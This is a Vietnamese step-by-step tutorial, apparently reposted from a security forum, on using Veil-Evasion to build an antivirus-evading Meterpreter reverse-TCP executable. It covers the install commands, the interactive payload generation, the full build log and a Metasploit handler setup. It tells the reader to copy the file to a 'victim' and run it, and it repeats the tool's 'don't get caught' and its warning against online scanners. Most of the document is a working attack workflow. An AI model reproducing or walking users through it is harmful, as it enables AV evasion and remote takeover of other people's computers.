Hướng dẫn dùng Veil tạo payload bypass antivirus

1. Veil là gì?

Veil được biết đến như là một công cụ có khả năng vượt qua những trình diệt virus cơ bản được dùng trong hoạt động pentesting. Veil làm việc này bằng cách tạo ra một payloads ngẫu nhiên và duy nhất.Chúng ta có thể so sánh những payloads này giống nhưng những malware đa hình, khác nhau giữa host này với host kia. Những payloads này hay hơn những malware truyền thống ở chỗ nó có khả năng thay đổi chữ ký – điều mà một chương trình diệt virus thường dùng (tất nhiên là chương trình diệt virus còn dùng cách khác) để xác định malware. Những mã khai thác của Veil tương thích với hầu hết những công cụ pentest như Metasploit.

2. Dùng như thế nào?
Bài này tác giả sử dụng Kali Linux làm máy tấn công và một máy tính khác chạy Windows XP SP2 với chương trình diệt virus ClamWin. Tác giả khẳng định nó hoạt động với các chương trình diệt virus cơ bản khác.

Đầu tiên là cài Veil vì nó không được tích hợp sẵn trên Kali Linux

root@kali:~# wget https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master
root@kali:~# unzip master
root@kali:~# cd Veil-Evasion-master/setup
root@kali:~/Veil-Evasion-master/setup# ./setup.sh

Chạy veil

root@kali:~/Veil-Evasion-master/setup# cd ..
root@kali:~/Veil-Evasion-master# ./Veil-Evasion.py

Bạn sẽ thấy một menu tương tác như thế này:

=========================================================================
Veil-Evasion | [Version]: 2.16.0
=========================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
=========================================================================

Main Menu

39 payloads loaded

Available commands:

use                         use a specific payload

info                        information on a specific payload

list          list available payloads

update                 update Veil to the latest version

clean                     clean out payload folders

checkvt                check payload hashes vs. VirusTotal

exit        exit Veil

[>] Please enter a command:

Dùng thử những command để hiểu hơn về Veil, ví dụ như list, info..
Veil-Evasion | [Version]: 2.16.0

=========================================================================

[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

=========================================================================

Payload information:

Name:                  python/meterpreter/rev_tcp

Language:           python

Rating:                  Excellent

Description:    pure windows/meterpreter/reverse_tcp stager, no

shellcode

Required Options:

Name                                   Current Value    Description

—-                                        ————-          ———–

LHOST                                  IP of the metasploit handler

LPORT                  4444       Port of the metasploit handler

compile_to_exe              Y              Compile to an executable

expire_payload               X             Optional: Payloads expire after “X” days

use_pyherion                   N             Use the pyherion encrypter

Để dùng một payload thì bạn chọn command use và mã số payloads có được từ lệnh list

[>] Please enter a command: use 26

=========================================================================

Veil-Evasion | [Version]: 2.16.0

=========================================================================

[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

=========================================================================

Payload: python/meterpreter/rev_tcp loaded

Required Options:

Name                                   Current Value    Description

—-                                        ————-          ———–

LHOST                                  IP of the metasploit handler

LPORT                  4444       Port of the metasploit handler

compile_to_exe              Y              Compile to an executable

expire_payload               X             Optional: Payloads expire after “X” days

use_pyherion                   N             Use the pyherion encrypter

Available commands:

set         set a specific option value

info                        show information about the payload

generate             generate payload

back                       go to the main menu

exit        exit Veil

[>] Please enter a command: set LHOST 192.168.0.14

[>] Please enter a command: generate

=========================================================================

Veil-Evasion | [Version]: 2.16.0

=========================================================================

[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

=========================================================================

[*] Press [enter] for ‘payload’

[>] Please enter the base name for output files: testPayload

[?] How would you like to create your payload executable?

1 – Pyinstaller (default)

2 – Pwnstaller (obfuscated Pyinstaller loader)

3 – Py2Exe

[>] Please enter the number of your choice: 1

err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.

130 INFO: wrote Z:\root\Veil-Evasion-master\testPayload.spec

176 INFO: Testing for ability to set icons, version resources…

189 INFO: … resource update available

191 INFO: UPX is not available.

1707 INFO: checking Analysis

1707 INFO: building Analysis because out00-Analysis.toc non existent

1707 INFO: running Analysis out00-Analysis.toc

1709 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable

1717 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww …

1717 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest

1720 INFO: Searching for file msvcr90.dll

1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll

1720 INFO: Searching for file msvcp90.dll

1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll

1720 INFO: Searching for file msvcm90.dll

1720 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll

1878 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py

3434 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py

3625 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py

3832 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py

3881 INFO: Analyzing /usr/share/veil-output/source/testPayload.py

4082 INFO: Hidden import ‘encodings’ has been found otherwise

4084 INFO: Looking for run-time hooks

4084 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py

4904 INFO: Warnings written to Z:\root\Veil-Evasion-master\build\pyi.win32\testPayload\warntestPayload.txt

4911 INFO: checking PYZ

4911 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing

4911 INFO: building PYZ out00-PYZ.toc

5546 INFO: checking PKG

5546 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing

5546 INFO: building PKG out00-PKG.pkg

6628 INFO: checking EXE

6628 INFO: rebuilding out00-EXE.toc because testPayload.exe missing

6628 INFO: building EXE from out00-EXE.toc

6633 INFO: Appending archive to EXE Z:\root\Veil-Evasion-master\dist\testPayload.exe

=========================================================================

Veil-Evasion | [Version]: 2.16.0

=========================================================================

[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework

=========================================================================

[*] Executable written to: /usr/share/veil-output/compiled/testPayload.exe

Language:                          python

Payload:                              python/meterpreter/rev_tcp

Required Options:      LHOST=192.168.0.14  LPORT=4444  compile_to_exe=Y

expire_payload=X  use_pyherion=N

Payload File:                      /usr/share/veil-output/source/testPayload.py

Handler File:                      /usr/share/veil-output/handlers/testPayload_handler.rc

[*] Your payload files have been generated, don’t get caught!

[!] And don’t submit samples to any online scanner! 

Nó nhắc các bạn là đừng có submit payload này lên mấy trang scan online kìa 

Xong, như vậy bạn đã có 1 file exe có khả năng bypass được một số antivirus (hi vọng thế)

Bước tiếp theo là copy file đó lên máy victim và chạy nó. Trên Kali Linux chúng ta sẽ mở một cái handler cho cái reverse tcp

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.0.14

LHOST => 192.168.0.14

msf exploit(handler) > set LPORT 4444

LPORT => 4444

msf exploit(handler) > set ExitOnSession false

ExitOnSession => false

msf exploit(handler) > exploit -j

Theo: http://forum.ceh.vn/Huong-dan-dung-Veil-tao-payload-bypass-antivirus-thread-7431-post-28093.ceh#pid28093